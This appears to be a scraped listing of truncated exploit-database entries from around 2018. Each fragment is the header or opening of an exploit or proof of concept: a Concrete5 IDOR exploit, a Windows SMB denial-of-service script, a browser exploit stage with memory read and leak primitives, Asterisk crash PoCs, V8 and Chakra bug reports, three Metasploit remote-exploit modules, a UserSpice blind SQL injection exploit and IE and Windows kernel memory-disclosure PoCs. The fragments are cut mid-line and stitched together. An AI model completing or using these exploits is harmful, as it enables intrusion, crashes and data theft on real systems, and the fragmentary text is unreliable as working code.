#!/usr/bin/env python3 # Concrete5 8.3 vulnerable to Authorization Bypass Through User-Controlled Key (IDOR) # CVE-2017-18195 # Chapman (R3naissance) Schleiss from queue import Queue from threading import Thread from bs4 import BeautifulSoup from ta
# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service # Date: 26/02/2018 # Exploit Author: Nabeel Ahmed # Version: SMBv3 # Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64) # CVE : CVE-2018-0833 import Soc
function stage4_() { function malloc(sz) { var backing = new Uint8Array(1000+sz); window.nogc.push(backing); var ptr = p.read8(p.leakval(backing).add32(0x10)); ptr.backing = backing; return ptr; } function malloc32(sz) { var backing = new Uint8Array(
# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport- Authors: - Alfred Farrugia alfred@enablesecurity.com - Sandro Gauci sandro@enablesecurity.com- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip
# Segmentation fault occurs in Asterisk with an invalid SDP media format description- Authors: - Alfred Farrugia alfred@enablesecurity.com - Sandro Gauci sandro@enablesecurity.com- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip`- Ref
Chrome: V8: Integer overflow with PropertyArray There's a snippet of the MigrateFastToFast function which is used to create a new PropertyArray object. int number_of_fields = new_map->NumberOfFields(); int inobject = new_map->GetInObjectProperties();
Microsoft Edge: Chakra: JIT: CallRegExSymbolFunction doesn't check the return type The CallRegExSymbolFunction method is used to call symbol functions in regexp objects. But it doesn't check the return value's type. Since the user can define the
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Expl
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Expl
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include
#!/usr/env/python Application UserSpice PHP user management Vulnerability UserSpice = 4.3 Blind SQL Injection exploit URL https://userspice.com Date 1.2.2018 Author Dolev Farhi About the App: What makes userspice different from almost any other PHP U
!-- There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Windows 7 64-bit with the latest patches applied. Note that the PoC was tested in a 64-bit tab p
/* We have discovered a new Windows kernel memory disclosure vulnerability in the creation and copying of a CONTEXT structure to user-mode memory. Two previous bugs in the nearby code area were reported in issues #1177 and #1311; in fact, the probl